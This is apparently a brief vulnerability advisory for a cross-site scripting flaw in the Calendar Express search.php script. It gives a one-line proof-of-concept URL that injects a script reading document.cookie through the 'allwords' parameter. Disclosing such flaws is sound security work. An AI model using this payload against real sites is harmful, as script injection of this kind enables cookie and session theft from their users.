|
Calendar Express Search.PHP Cross-Site Scripting Vulnerability
No exploit is required. The following proof of concept URI is available: http://www.example.com/calendarexpress/search.php?allwords=<br><script>alert(document.cookie);</script>&cid=0&title=1&desc=1 |
|
|
Privacy Statement |